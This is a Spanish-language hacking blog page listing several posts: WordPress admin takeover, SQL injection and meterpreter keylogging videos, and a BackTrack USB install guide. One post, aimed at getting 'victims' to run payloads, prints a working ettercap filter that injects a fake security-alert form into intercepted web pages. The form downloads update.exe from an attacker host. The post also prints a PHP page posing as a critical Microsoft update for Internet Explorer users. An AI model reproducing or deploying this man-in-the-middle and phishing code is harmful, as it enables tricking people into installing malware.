mi openSUSE


Sacate una foto!

Blogroll: 6

[x] Agregar a darkspark

maztor maztor
virtux virtux
murder murder
komtec1 komtec1
pandemic pandemic
mandeville mandeville

Perfil de darkspark

[x]Nick: darkspark
Rango: Amateur
País: mx
Visitas: 7697
Votos: 32
En Blogrolls: 13
Status: PM

Patrocinadores:


Anuncia aquí

[x] word_press+force-download.php=owned

Publicado el 16/02/2010 12:02:00 en Videos Hacking. Total de votos: 5  Votar

bueno pues aquí le dejo este vídeo de como aprovechar el archivo force-download.php ( o similares ) para obtener acceso al panel de administración, en este caso de word press.






DESCARGAR EL VÍDEO (.avi)

Comentarios: 13 | Leer comentarios

[x] 2 ideas de como lograr que ejecuten nuestros payloads

Publicado el 26/01/2010 12:01:00 en Hack Avanzado. Total de votos: 1  Votar

Primero que nada, este no es un videotutorial, la intencion es solo de dar ideas de como se puede lograr que las "victimas" descargen y ejecuten nuestros payloads.
cualquier duda de las tecnicas usadas en el video pueden preguntar o buscar en google ( aqui mismo ay varios post ).





DESCARGAR EL VIDEO ( AVI )


filtro utilizado en el video ( cortesia de Pandemic )

if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
           replace("Accept-Encoding", "Accept-Be-Owned");
      }
}

if (ip.proto == TCP && tcp.src == 80) {
      if (search(DATA.data, "<title>")) {
           replace("</title>", "</title><form
 action="http://192.168.1.67/update.exe" method="link"><center><img src="http://192.168.1.67/alert.jpg"><br><br><INPUT TYPE=submit value="Descargar actualizacion"></form><html><body><h1><font color=red>Alerta de seguridad</font></h1></body></html>");
      replace("<head>", "<head> <title> Software Upgrade </title> <body><font color=black  size=10> Please download the last Active X security upgrade to Continue  </font><body text="#ffffff" link="#ffff33" alink="#ffffcc" alink="ffff00"></center> </body> </head>" ");
msg("Filtro activado.\n");   
           msg("html inyectado exitosamente!!");
      }}





Index Utilizado en el video






<?php
$navegador = getenv("HTTP_USER_AGENT");
if (preg_match("/MSIE/i", "$navegador"))
{
echo "<html>
      <head>
      <META http-equiv='Content-Type' content='text/html; charset=utf-8'>
      <style> 
       body 
       {
        background-image:url('ie-8.jpg');
        background-repeat: no-repeat;
        background-position:center;
       }
      </style>
      </head>
      <body><h2 align='center'><font color='red'>Actualizacion Critica De Seguridad</font></h2><br>
      <h3><pre><center><a href='http://www.microsoft.com/spain/technet/security/bulletin/ms10-002.mspx'>MS10-002:</a> trata las vulnerabilidades en Internet Explorer (KB 978207)

Los profesionales de TI y los administradores de sistemas deben consultar <a href='http://www.microsoft.com/spain/technet/security/bulletin/current.mspx'>TechNet</a><br>de Microsoft para obtener información detallada acerca de estas actualizaciones.

</pre></h3>
     <h2 align='center'>...


Continúa aquí...


Comentarios: 4 | Leer comentarios

[x] Instalar Back | Track 4 Final en una USB con cambios persistentes

Publicado el 19/01/2010 12:01:00 en Linux. Total de votos: 2  Votar

Bueno como el titulo lo indica, este tutorial muestra como instalar BT4 final en una usb con cambios persistentes (para no perder la configuracion,personalisacion,programas instalados,etc).

Para realizar este tutorial me base en este HOW-TO, y le añadi unas cosas de mi cosecha jeje.

bien empesemos:

primero que nada nesesitamos lo siguiente:

1.- 1 DVD o en su defecto una USB de 2G minimo
2.- 1 USB de 4G minimo ( en esta sera donde quede instalado BT)
3.- UNetbootin ( opcional para hacer un live-USB si no tenemos un DVD )

bien. lo primero que vamos a hacer es bajar BT4 final y quemarlo en nuestro DVD o bien utilizar UNebootin para pasar la imagen al USB de 2G ( para hacer esto podemos seguir este otro HOW-TO

una ves que tenemos nuestro DVD (o USB) listo iniciamos BT y lo primero que vamos a hacer sera particionar nuetra USB de 4G .

abrimos una consola y ejecutamos el comando

fdisk -l

para ver cual es el nombre de nuestro usb, en mi caso es /dev/sdb
ya que sabemos cual es tecleamos el comando



fdisk /dev/sdb

primero borramos la(s) particiones existentes.


Command (m for help): d
Partition number (1-4): 1

creamos la primera particion de 1.5G

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 1
First cylinder (1-522, default 1): <enter>
Using default value 1
Last cylinder, +cylinders or +size{K,M,G} (1-522, default 522): +1500M

ahora creamos la segunda particion en el resto del espacio en la USB

Command (m for help): n
Command action
e extended
p primary partition (1-4)
p
Partition number (1-4): 2
First cylinder (193-522, default 193): <enter>
Using default value 193
Last cylinder, +cylinders or +size{K,M,G} (193-522, default 522): <enter>
Using default value 522

Cambiamos el tipo a FAT32 de la primera particion

Command (m for help): t
Partition number (1-4): 1
Hex code (type L to list codes): b
Changed system type of partition 1 to b (W95 FAT32)

cambiamos el tipo a LINUX de la segunda particion


Command (m for help): t
Partition number (1-4): 2
Hex code (type L to list codes): 83

hacemos que la primera particion sea activa


Command (m for help): a
Partition number (1-4): 1

guardamos los cambios

Command (m for help): w

ahora vamos a formatear nuestras particiones con los comandos:

mkfs.vfat /dev/sdb1
mkfs.ext3 -b 4096 -L casper-rw /dev/sdb2 (las opciones -b 40...

Continúa aquí...


Comentarios: 1 | Leer comentarios

[x] video tutorial inyeccion SQL basica

Publicado el 02/01/2010 12:01:00 en Hacking Web. Total de votos: 1  Votar

bueno pues como el titulo lo dice, este es un pequeño video tutorial de injeccion SQL, espero les guste =)




tambien dejo el enlace de descarga pues en youtube no se aprecia bien.

DESCARGAR VIDEO

Comentarios: 4 | Leer comentarios

[x] sniffing keyboards in LAN with meterpreter

Publicado el 30/11/2009 12:11:00 en Videos Hacking. Total de votos: 4  Votar

aqui les dejo un video en el que muestro como sniffear teclados en una lan utilizando metasploit


DESCARGAR

Comentarios: 7 | Leer comentarios